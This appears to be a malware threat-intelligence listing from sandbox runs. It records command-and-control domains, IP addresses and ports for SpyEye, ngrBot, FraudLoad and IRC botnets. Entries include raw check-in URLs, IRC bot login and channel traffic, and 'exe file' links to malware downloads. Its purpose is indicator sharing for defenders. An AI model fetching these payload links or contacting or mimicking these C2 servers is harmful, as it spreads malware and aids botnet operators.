DNS Queries:
Name: darkdosser.redirectme.net
Query Type: DNS_TYPE_A
Query Result: 68.117.95.139
Successful: YES
Protocol: udp
TCP Traffic: 68.117.95.139:3333
exe file: http://86247b6f.goneviral.com
info about hosting: http://whois.domaintools.com/68.117.95.139
forwardmotionconcepts.com (SpyEye banking trojan hosted in United States, Dallas, Softlayer Technologies Inc)
Remote Host / Port Number: 173.192.41.194 80
The data identified by the following URL was then requested from the remote web server:
http://forwardmotionconcepts.com/wip5/main/gate.php?guid=UserName!COMPUTERNAME!00CD1A40&ver=10299&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&plg=billinghammer;creditgrab;ftpbc;socks5;USBSpread&cpu=100&ccrc=0D98E50E&md5=fc5531793ca5bebd917e6ef85d709272
SpyEye Panel: http://forwardmotionconcepts.com/wip5/main/
exe file: http://9d0a7f4d.tinylinks.co
info about hosting: http://whois.domaintools.com/173.192.41.194
111.90.139.77 (ngrbot hosted in Malaysia, Piradius Net)
Remote Host / Port Number: 111.90.139.77 1863
PASS ngrBot
Remote Host / Port Number: 213.251.170.52 80
NICK n{US|XPa}szcacic
USER szcacic 0 0 :szcacic
JOIN #IrcPeru PeruRulz!!
info about hosting: http://whois.domaintools.com/111.90.139.77
twtw.toh.info (Chinese malware hosted in Hong Kong, Nwt Idc Data Service)
DNS Queries:
Name: twtw.toh.info
Query Type: DNS_TYPE_A
Query Result: 58.64.203.53
Successful: YES
Protocol: udp
Unknown TCP Traffic: 58.64.203.53:443
State: Connection established, not terminated
Transferred outbound Bytes: 672
Transferred inbound Bytes: 14657
Data sent:
exe file: http://a3dc4d85.theseblogs.com
info about hosting: http://whois.domaintools.com/58.64.203.53
tf122.tefgame.com (Trojan-Downloader.Win32.FraudLoad hosted in United States, Dallas, Theplanet.com Internet Services Inc)
DNS Queries:
Name: tf122.tefgame.com
Query Type: DNS_TYPE_A
Query Result: 174.122.138.122
Successful: YES
Protocol: udp
TCP Connection Attempts: 174.122.138.122:8800
exe file: http://549ff376.megaline.co
info about hosting: http://whois.domaintools.com/174.122.138.122
one.123back.com (botnet hosted in Lithuania, Webhosting Collocation Services)
Remote Host / Port Number: 77.79.6.83 6667
NICK [XP-5771910]
NOTICE [XP-5771910] : PING 1303048457
PRIVMSG [XP-5771910] : PING 1303048487
PING 1303048519
USER Tulkarm "" "one.123back.com" :Crack GT [Evolution] -=- Version 4.1
USERHOST [XP-5771910]
MODE #Chats
NICK :i386[XP]25677
MODE [XP-5771910] +i-x
JOIN #KSA# coded.v
MODE #KSA#
UPDATE:
Remote Host / Port Number: 77.79.6.83 1863
NICK |NeW|-{USA-XP|594283}
USER 5942
205.234.231.54 (botnet hosted in United States, Chicago, Hostforweb Inc)
Remote Host / Port Number: 205.234.231.54 2345
MODE New[USA|00|P|98932] -ix
JOIN #!loco!
PONG 22
MOTD
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
info about hosting: http://whois.domaintools.com/205.234.231.54
70.107.249.167 (botnet hosted in United States, Whitestone, Verizon Online Llc)
Remote Host / Port Number: 70.107.249.167 7000
NICK SL624232320666
USER kerwvaiajtadgu 0 0 :SL624232320666
USERHOST SL624232320666
MODE SL624232320666 +i
JOIN #GL .x.
info about hosting: http://whois.domaintools.com/70.107.249.167
92.241.165.156 (botnet hosted in Russian Federation, 2x4.ru Network)
Remote Host / Port Number:
174.37.200.82 80
204.0.5.35 80
216.178.39.11 80
63.135.80.224 80
69.171.224.12 80
92.241.165.156 1234
PASS xxx
NICK NEW-[USA|00|P|00429]
USER XP-8653 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|00429] -ix
JOIN #!nn! test
PONG 22
MOTD
info about hosting: http://whois.domaintools.com/92.241.165.156
94.249.188.86 (botnet hosted in Germany, Ghostnet Gmbh)
Remote Host / Port Number: 94.249.188.86 2345
NICK [USA|00|P|40787]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-2097 * 0 :COMPUTERNAME
MODE [USA|00|P|40787] -ix
JOIN #!loco!
PONG 22
MOTD
info about hosting: http://whois.domaintools.com/94.249.188.86